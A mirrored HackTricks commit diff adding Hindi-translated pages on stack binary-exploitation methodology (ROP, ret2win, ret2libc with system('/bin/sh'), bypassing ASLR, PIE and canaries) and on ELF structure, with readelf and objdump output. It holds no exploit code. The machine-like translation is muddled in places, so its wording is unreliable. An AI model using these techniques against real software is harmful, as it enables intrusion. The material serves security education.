Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

Browse source
This commit is contained in:
Translator 2024-06-18 11:50:14 +00:00
parent 6ee3813fe4
commit e9f9f78607
6 changed files with 963 additions and 44 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
SUMMARY.md
View file

@ -690,10 +690,10 @@
## 🎯 Binary Exploitation
* [Basic Binary Exploitation Methodology](binary-exploitation/basic-binary-exploitation-methodology/README.md)
* [ELF Basic Information](binary-exploitation/basic-binary-exploitation-methodology/elf-tricks.md)
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
* [Basic Stack Binary Exploitation Methodology](binary-exploitation/basic-stack-binary-exploitation-methodology/README.md)
* [ELF Basic Information](binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md)
* [Exploiting Tools](binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md)
* [PwnTools](binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md)
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
* [Ret2win](binary-exploitation/stack-overflow/ret2win/README.md)

113
binary-exploitation/basic-stack-binary-exploitation-methodology/README.md Normal file
View file

@ -0,0 +1,113 @@
# मूल बाइनरी उत्पीड़न विधि
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
## ELF मूल जानकारी
किसी भी चीज का उत्पीड़न शुरू करने से पहले एक **ELF बाइनरी** के संरचना का हिस्सा समझना दिलचस्प है:
{% content-ref url="elf-tricks.md" %}
[elf-tricks.md](elf-tricks.md)
{% endcontent-ref %}
## उत्पीड़न उपकरण
{% content-ref url="tools/" %}
[tools](tools/)
{% endcontent-ref %}
## स्टैक ओवरफ्लो मेथडोलॉजी
इतनी सारी तकनीकों के साथ, प्रत्येक तकनीक कब उपयोगी होगी इसका एक योजना रखना अच्छा है। ध्यान दें कि विभिन्न सुरक्षा उपायों पर भिन्न तकनीकों को प्रभावित करेगा। आप प्रत्येक सुरक्षा अनुभाग में सुरक्षा उपायों को छलने के तरीके पा सकते हैं लेकिन इस विधि में नहीं।
## फ्लो को नियंत्रित करना
किसी कार्यक्रम के फ्लो को नियंत्रित करने के विभिन्न तरीके हैं:
* [**स्टैक ओवरफ्लो**](../stack-overflow/) स्टैक से वापसी प्वाइंटर या EBP -> ESP -> EIP को ओवरराइट करना।
* ओवरफ्लो को कारण बनाने के लिए एक [**पूर्णांक ओवरफ्लो**](../integer-overflow.md) का दुरुपयोग करना पड़ सकता है
* या वाया **अर्बिट्रेरी राइट्स + राइट वॉट व्हेर टू एक्झीक्यूशन**
* [**फॉर्मेट स्ट्रिंग**](../format-strings/)**:** `printf` का दुरुपयोग करके किसी भी पते पर अर्बिट्रेरी सामग्री लिखने का दुरुपयोग करें।
* [**एरे इंडेक्सिंग**](../array-indexing.md): एक खराब डिज़ाइन की इंडेक्सिंग का दुरुपयोग करके कुछ एरे को नियंत्रित करने और एक अर्बिट्रेरी राइट प्राप्त करने की क्षमता हो सकती है।
* ओवरफ्लो को कारण बनाने के लिए एक [**पूर्णांक ओवरफ्लो**](../integer-overflow.md) का दुरुपयोग करना पड़ सकता है
* **bof से WWW के माध्यम से ROP**: एक बफर ओवरफ्लो का दुरुपयोग करके एक ROP बनाने और एक WWW प्राप्त करने की क्षमता हो सकती है।
आप **Write What Where to Execution** तकनीकों को निम्नलिखित में पा सकते हैं:
{% content-ref url="../arbitrary-write-2-exec/" %}
[arbitrary-write-2-exec](../arbitrary-write-2-exec/)
{% endcontent-ref %}
## अनंत लूप
एक बात को ध्यान में रखना चाहिए कि आम तौर पर **किसी भी वंर्बलिटी का केवल एक उत्पीड़न** कारगर नहीं हो सकता, विशेष रूप से कुछ सुरक्षा को छलने की आवश्यकता होती है। इसलिए, एक विकल्पों पर चर्चा करना दिलचस्प है कि **एक ही वंर्बलिटी को एक ही बार कई बार उत्पीड़नीय बनाने** के लिए कुछ विकल्पों को चर्चा करना दिलचस्प है:
* **ROP** श्रृंखला में **`main` फ़ंक्शन** का पता या वंर्बलिटी हो रही है वहाँ का पता लिखें।
* एक उचित ROP श्रृंखला को नियंत्रित करके आप उस श्रृंखला में सभी क्रियाएँ कर सकते हैं
* **`exit` पता GOT** में लिखें (या इससे पहले बाइनरी द्वारा उपयोग किया जाने वाला कोई अन्य फ़ंक्शन) वापस जाने के लिए **वंर्बलिटी पर**
* जैसा कि [**.fini\_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md#eternal-loop)** में स्पष्ट किया गया है,** यहाँ 2 फ़ंक्शन स्टोर करें, एक वंर्बलिटी को फिर से बुलाने के लिए और एक **`__libc_csu_fini`** को बुलाने के लिए जो `.fini_array` से फिर से फ़ंक्शन को बुलाएगा।
## उत्पीड़न लक्ष्य
### लक्ष्य: मौजूदा फ़ंक्शन को बुलाना
* [**ret2win**](./#ret2win): कोड में एक फ़ंक्शन है जिसे आपको बुलाने की आवश्यकता है (शायद कुछ विशेष पैरामीटर्स के साथ) ताकि झंडा प्राप्त कर सकें।
* एक **साधारण bof बिना** [**PIE**](../common-binary-protections-and-bypasses/pie/) **और** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) **के,** आपको बस स्टैक में स्टोर किए गए वापसी पते में पता लिखने की आवश्यकता है।
* [**PIE**](../common-binary-protections-and-bypasses/pie/) के साथ एक bof में, आपको इसे छलना होगा
* [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) के साथ एक bof में, आपको इसे छलना होगा
* यदि आपको **ret2win** फ़ंक्शन को सही ढंग से बुलाने के लिए कई पैरामीटर सेट करने की आवश्यकता है तो आप इस्तेमाल कर सकते हैं:
* यदि पैरामीटर्स को तैयार करने के लिए पर्याप्त गैजेट्स हैं तो एक [**ROP**](./#rop-and-ret2...-techniques) **श्रृंखला**
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (यदि आप इस सिस्टम को कॉल कर सकते हैं) जिससे आप बहुत सारे रजिस्टर्स को नियंत्रित कर सकते हैं
* [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) और [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) से गैजेट्स जिससे आप कई रजिस्टर्स को नियंत्रित कर सकते हैं
* एक [**Write What Where**](../arbitrary-write-2-exec/) के माध्यम से आप अन्य वल्न्स (बफर ओवरफ्लो नहीं) का दुरुपयोग करके **`win`** फ़ंक्शन को कॉल कर सकते हैं।
* [**पॉइंटर्स रीडायरेक्टिंग**](../stack-overflow/pointer-redirecting.md): यदि स्टैक में एक फ़ंक्शन के पॉइंटर हैं जो कॉल किया जाएगा या एक ऐसी स्ट्रिंग के पॉइंटर हैं जो एक दिलचस्प फ़ंक्शन (सिस्टम या printf) द्वारा उपयोग किया जाएगा, तो उस पते को ओवरराइट करना संभव है।
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) या [**PIE**](../common-binary-protections-and-bypasses/pie/) पतों को प्रभावित कर सकता है।
* [**अअनिटाइलाइज्ड वेरिएबल्स**](../stack-overflow/uninitialized-variables.md): आप कभी नहीं जान सकते।
### लक्ष्य: RCE
#### शेलकोड के माध्यम से, यदि nx अक्षम है या
#### वाया सिसकॉल्स
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): `execve` को बुलाने के लिए उपयोगी। आपको **पैरामीटर्स के साथ विशिष्ट सिसकॉल को बुलाने के लिए गैजेट्स खोजने की आवश्यकता है**
* यदि [**ASLR**](../common-binary-protections-and-bypasses/aslr/) या [**PIE**](../common-binary-protections-and-bypasses/pie/) सक्षम हैं तो आपको उन्हें हराना होगा **ROP गैजेट्स का उपयोग करने के लिए** बाइनरी या लाइब्रेरी से।
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) **ret2execve** को तैयार करने के लिए उपयोगी हो सकता है।
* [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) और [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) से गैजेट्स को कई रजिस्टर को नियंत्रित करने के लिए।
#### वाया libc
* [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): लाइब्रेरी से फ़ंक्शन को बुलाने के लिए उपयोगी (सामान्यत: **`libc`** से) जैसे **`system`** के साथ कुछ तैयार किए गए तर्क (जैसे `'/bin/sh'`)। आपको बाइनरी को **लाइब्रेरी लोड करने** की आवश्यकता है जिसमें आपको बुलाना चाहते हैं (सामान्यत: libc)।
* यदि **स्थायी रूप से कंपाइल किया गया है और कोई** [**PIE**](../common-binary-protections-and-bypasses/pie/) नहीं है, तो `system` और `/bin/sh` का **पता** नहीं बदलेगा, इसलिए इन्हें स्थायी रूप से उपयोग करना संभव है।
* **बिना** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **और libc संस्करण को जानते हुए**, `system` और `/bin/sh` का **पता** नहीं बदलेगा, इसलिए इन्हें स्थायी रूप से उपयोग करना संभव है।
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) के साथ **लेकिन कोई** [**PIE**](../common-binary-protections-and-bypasses/pie/)** नहीं, libc को जानते हुए और बाइनरी जिसमें `system`** फ़ंक्शन का उपयोग हो रहा है, इसे संभव है कि **GOT में सिस्टम के पते पर `ret`** किया जाए और पैरामेटर में `'/bin/sh'` के पते के साथ (आपको इसे समझने की आवश्यकता है)।
* [ASLR](../common-binary-protections-and-bypasses/aslr/) के साथ लेकिन [PIE](../common-binary-protections-and-bypasses/pie/) के बिना, libc को जानते हुए और **बाइनरी में `system` का उपयोग न करते हुए**:
* **`ret2dlresolve`** का उपयोग करें जिससे `system` का पता लगाया जा सके और इसे बुलाया जा सके&#x20;
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) को **बाइपास** करें और `system` और `'/bin/sh'` का पता लगाएं में।
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) के साथ और [**PIE**](../common-binary-protections-and-bypasses/pie/) के साथ **और libc को नहीं जानते**: आपको चाहिए:
* [**PIE**](../common-binary-protections-and-bypasses/pie/) को बाइपास करें
* उपयोग किए गए **`libc` संस्करण** को खोजें (कुछ फ़ंक्शन पतों को लीक करें)
* आगे बढ़ने के लिए **ASLR के पिछले स्थितियों की जांच करें**
#### वाया EBP/RBP
* [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): ESP को नियंत्रित करने के लिए EBP को नियंत्रित करें जिसके माध्यम से स्टोर्ड EBP के माध्यम से RET को नियंत्रित करें।
* **ओफ-बाय-वन** स्टैक ओवरफ्लो के लिए उपयोगी
* EIP को नियंत्रित करने के एक वैकल्पिक तरीके के रूप में उपयुक्त है जबकि EIP को उपयोग करके मेमोरी में पेलोड निर्माण करने और फिर उस पर जाने के लिए EBP के माध्यम से उस पर जाने के लिए।
#### विविध
* [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): यदि स्टैक में एक फ़ंक्शन के पॉइंटर या एक स्ट्रिंग के पॉइंटर है जिसे बुलाया जाएगा या जिसे एक दिलचस्प फ़ंक्शन (सिस्टम या प्रिंटफ़) द्वारा उपयोग किया जाएगा, तो उस पते को ओवरराइट करना संभव है।
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) या [**PIE**](../common-binary-protections-and-bypasses/pie/) पतों को प्रभावित कर सकते हैं।
* [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): आप कभी नहीं जान सकते

389
binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md Normal file
View file

@ -0,0 +1,389 @@
# ELF मूल जानकारी
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो में पीआर जमा करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
## प्रोग्राम हेडर्स
यह लोडर को बताते हैं कि **ELF** को मेमोरी में कैसे लोड करना है:
```bash
readelf -lW lnstat
Elf file type is DYN (Position-Independent Executable file)
Entry point 0x1c00
There are 9 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8
INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1
[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000
LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000
DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8
NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4
GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .data .bss
04 .dynamic
05 .note.gnu.build-id .note.ABI-tag .note.package
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
```
पिछले प्रोग्राम में **9 प्रोग्राम हेडर्स** हैं, फिर, **सेगमेंट मैपिंग** इसका संकेत देता है कि किस प्रोग्राम हेडर (00 से 08 तक) में **प्रत्येक सेक्शन स्थित है**
### PHDR - प्रोग्राम हेडर
प्रोग्राम हेडर तालिकाएँ और मेटाडेटा स्वयं को समाहित करता है।
### INTERP
बाइनरी को मेमोरी में लोड करने के लिए उपयोग करने वाले लोडर का पथ दर्शाता है।
### LOAD
ये हेडर्स इसका संकेत देते हैं कि **मेमोरी में बाइनरी को कैसे लोड करें**।\
प्रत्येक **LOAD** हेडर एक **मेमोरी क्षेत्र** (आकार, अनुमतियाँ और संरेखण) को दर्शाता है और ELF **बाइनरी के बाइट्स की उसमें कॉपी करने की सूचना देता है**
उदाहरण के लिए, दूसरा हेडर 0x1190 का आकार है, 0x1fc48 पर स्थित होना चाहिए, पढ़ने और लिखने की अनुमतियों के साथ होगा और 0xfc48 से 0x528 के बाइट्स के साथ भरा जाएगा (यह सभी आरक्षित स्थान को भरता नहीं है)। यह मेमोरी सेक्शन `.init_array .fini_array .dynamic .got .data .bss` को शामिल करेगी।
### DYNAMIC
यह हेडर कार्यक्रमों को उनके पुस्तकालय आवश्यकताओं से जोड़ने और स्थानांतरणों को लागू करने में मदद करता है। **`.dynamic`** सेक्शन की जाँच करें।
### NOTE
यह बाइनरी के बारे में विक्रेता मेटाडेटा जानकारी संग्रहित करता है।
### GNU\_EH\_FRAME
स्टैक अनवाइंड तालिकाओं का स्थान निर्धारित करता है, जिसे डीबगर और सी++ अपशिष्ट प्रबंधन-समय कार्यों द्वारा उपयोग किया जाता है।
### GNU\_STACK
स्टैक निषेध रक्षा के कॉन्फ़िगरेशन को शामिल करता है। यदि सक्षम है, तो बाइनरी स्टैक से कोड नहीं चला सकेगा।
### GNU\_RELRO
बाइनरी की RELRO (स्थानांतरण केवल पढ़ने योग्य) कॉन्फ़िगरेशन को दर्शाता है। यह सुरक्षा निश्चित स्थानों को पढ़ने-केवल रूप में चिह्नित करेगा (जैसे `GOT` या `init` और `fini` तालिकाएँ) जब प्रोग्राम लोड हो जाता है और उसका निष्पादन शुरू होने से पहले।
पिछले उदाहरण में 0x3b8 बाइट्स को 0x1fc48 पर पढ़ने-केवल के रूप में कॉपी किया जा रहा है जिससे `.init_array .fini_array .dynamic .got .data .bss` सेक्शन प्रभावित होंगे।
ध्यान दें कि RELRO आंशिक या पूर्ण हो सकता है, आंशिक संस्करण **`.plt.got`** सेक्शन को संरेखित करता नहीं है, जिसे **लेजी बाइंडिंग** के लिए उपयोग किया जाता है और इस स्मृति स्थान को **लिखने की अनुमति** होनी चाहिए ताकि पहली बार उनकी स्थान खोजी जाए।
### TLS
TLS प्रविष्टियों की एक तालिका को परिभाषित करता है, जो सूत्र-स्थानीय चरित्र चर्चाओं के बारे में जानकारी संग्रहित करती है।
## सेक्शन हेडर्स
सेक्शन हेडर्स एलएफ बाइनरी का एक और विस्तृत दृश्य प्रदान करते हैं।
```
objdump lnstat -h
lnstat: file format elf64-littleaarch64
Sections:
Idx Name Size VMA LMA File off Algn
0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1
CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6
CONTENTS, ALLOC, LOAD, READONLY, CODE
14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3
CONTENTS, ALLOC, LOAD, DATA
19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3
CONTENTS, ALLOC, LOAD, DATA
20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3
CONTENTS, ALLOC, LOAD, DATA
21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3
CONTENTS, ALLOC, LOAD, DATA
22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3
ALLOC
24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0
CONTENTS, READONLY
25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2
CONTENTS, READONLY
```
### मेटा खंड
* **स्ट्रिंग टेबल**: यह सभी स्ट्रिंग्स को संग्रहीत करता है जो ELF फ़ाइल द्वारा आवश्यक हैं (लेकिन कार्यक्रम द्वारा वास्तव में उपयोग की जाने वाली नहीं।) उदाहरण के लिए, यह खंड धाराएँ नामों को शामिल करता है जैसे `.text` या `.data`। और यदि `.text` स्ट्रिंग टेबल में ऑफसेट 45 पर है तो यह **नाम** फ़ील्ड में नंबर **45** का उपयोग करेगा।
* स्ट्रिंग टेबल का पता लगाने के लिए, ELF में स्ट्रिंग टेबल के लिए एक पॉइंटर होता है।
* **सिम्बल टेबल**: इसमें सिम्बल के बारे में जानकारी होती है जैसे नाम (स्ट्रिंग टेबल में ऑफसेट), पता, आकार और सिम्बल के बारे में अधिक मेटाडेटा।
### मुख्य खंड
* **`.text`**: कार्यक्रम के निर्देश को चलाने के लिए।
* **`.data`**: कार्यक्रम में परिभाषित मान वाले ग्लोबल वेरिएबल्स।
* **`.bss`**: अपरिभाषित ग्लोबल वेरिएबल्स (या जीरो से आरंभित)। यहाँ के वेरिएबल्स स्वचालित रूप से शून्य पर आरंभित होते हैं इसलिए बाइनरी में अनावश्यक शून्यों को जोड़ने से बचाते हैं।
* **`.rodata`**: स्थिर ग्लोबल वेरिएबल्स (केवल पढ़ने योग्य खंड)।
* **`.tdata`** और **`.tbss`**: .data और .bss की तरह जब स्थानीय धागा वेरिएबल्स का उपयोग होता है (`__thread_local` सी++ में या `__thread` में)।
* **`.dynamic`**: नीचे देखें।
## सिम्बल्स
सिम्बल्स कार्यक्रम में एक नामित स्थान है जो एक फ़ंक्शन, एक ग्लोबल डेटा ऑब्जेक्ट, स्थानीय धागा वेरिएबल्स हो सकता है...
```
readelf -s lnstat
Symbol table '.dynsym' contains 49 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init
2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2)
5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2)
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2)
7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2)
8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3)
9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2)
10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2)
12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2)
[...]
```
Each symbol entry contains:
* **नाम**
* **बाइंडिंग गुण** (कमजोर, स्थानीय या ग्लोबल): स्थानीय प्रतीक केवल कार्यक्रम द्वारा पहुंचा जा सकता है जबकि ग्लोबल प्रतीक कार्यक्रम के बाहर साझा किए जाते हैं। एक कमजोर वस्तु उदाहरण के लिए एक ऐसा कार्य है जिसे एक अलग से ओवरराइड किया जा सकता है।
* **प्रकार**: NOTYPE (कोई प्रकार निर्दिष्ट नहीं), OBJECT (ग्लोबल डेटा वेर), FUNC (कार्य), SECTION (खंड), FILE (डीबगर के लिए स्रोत-कोड फ़ाइल), TLS (सूत्र-स्थानीय चर), GNU\_IFUNC (पुनर्स्थापन के लिए अप्रत्यक्ष कार्य)
* **खंड** सूची जिसमें यह स्थित है
* **मूल्य** (मेमोरी में पता)
* **आकार**
## गतिशील खंड
```
readelf -d lnstat
Dynamic section at offset 0xfc58 contains 28 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1]
0x000000000000000c (INIT) 0x1088
0x000000000000000d (FINI) 0x2f74
0x0000000000000019 (INIT_ARRAY) 0x1fc48
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x1fc50
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x338
0x0000000000000005 (STRTAB) 0x7f0
0x0000000000000006 (SYMTAB) 0x358
0x000000000000000a (STRSZ) 510 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000015 (DEBUG) 0x0
0x0000000000000003 (PLTGOT) 0x1fe58
0x0000000000000002 (PLTRELSZ) 960 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0xcc8
0x0000000000000007 (RELA) 0xaa0
0x0000000000000008 (RELASZ) 552 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000000000001e (FLAGS) BIND_NOW
0x000000006ffffffb (FLAGS_1) Flags: NOW PIE
0x000000006ffffffe (VERNEED) 0xa50
0x000000006fffffff (VERNEEDNUM) 2
0x000000006ffffff0 (VERSYM) 0x9ee
0x000000006ffffff9 (RELACOUNT) 15
0x0000000000000000 (NULL) 0x0
```
आवश्यक निर्देशिका इसका संकेत देती है कि कार्यक्रम **उस उल्लिखित पुस्तकालय को लोड करने की आवश्यकता** है ताकि आगे बढ़ सके। जब साझा **पुस्तकालय पूरी तरह से संचालनयोग्य और तैयार** हो जाता है, तो आवश्यक निर्देशिका पूरी हो जाती है।
## पुनर्थानन
लोडर को इन्हें भी पुनर्थानन करना होता है जब उन्होंने उन्हें लोड कर लिया है। ये पुनर्थानन निर्देशिका में REL या RELA प्रारूप में दिखाए जाते हैं और पुनर्थाननों की संख्या डायनामिक खंडों RELSZ या RELASZ में दी जाती है।
```
readelf -r lnstat
Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fc48 000000000403 R_AARCH64_RELATIV 1d10
00000001fc50 000000000403 R_AARCH64_RELATIV 1cc0
00000001fff0 000000000403 R_AARCH64_RELATIV 1340
000000020008 000000000403 R_AARCH64_RELATIV 20008
000000020010 000000000403 R_AARCH64_RELATIV 3330
000000020030 000000000403 R_AARCH64_RELATIV 3338
000000020050 000000000403 R_AARCH64_RELATIV 3340
000000020070 000000000403 R_AARCH64_RELATIV 3348
000000020090 000000000403 R_AARCH64_RELATIV 3350
0000000200b0 000000000403 R_AARCH64_RELATIV 3358
0000000200d0 000000000403 R_AARCH64_RELATIV 3360
0000000200f0 000000000403 R_AARCH64_RELATIV 3370
000000020110 000000000403 R_AARCH64_RELATIV 3378
000000020130 000000000403 R_AARCH64_RELATIV 3380
000000020150 000000000403 R_AARCH64_RELATIV 3388
00000001ffb8 000a00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_deregisterTM[...] + 0
00000001ffc0 000b00000401 R_AARCH64_GLOB_DA 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001ffc8 000f00000401 R_AARCH64_GLOB_DA 0000000000000000 stderr@GLIBC_2.17 + 0
00000001ffd0 001000000401 R_AARCH64_GLOB_DA 0000000000000000 optarg@GLIBC_2.17 + 0
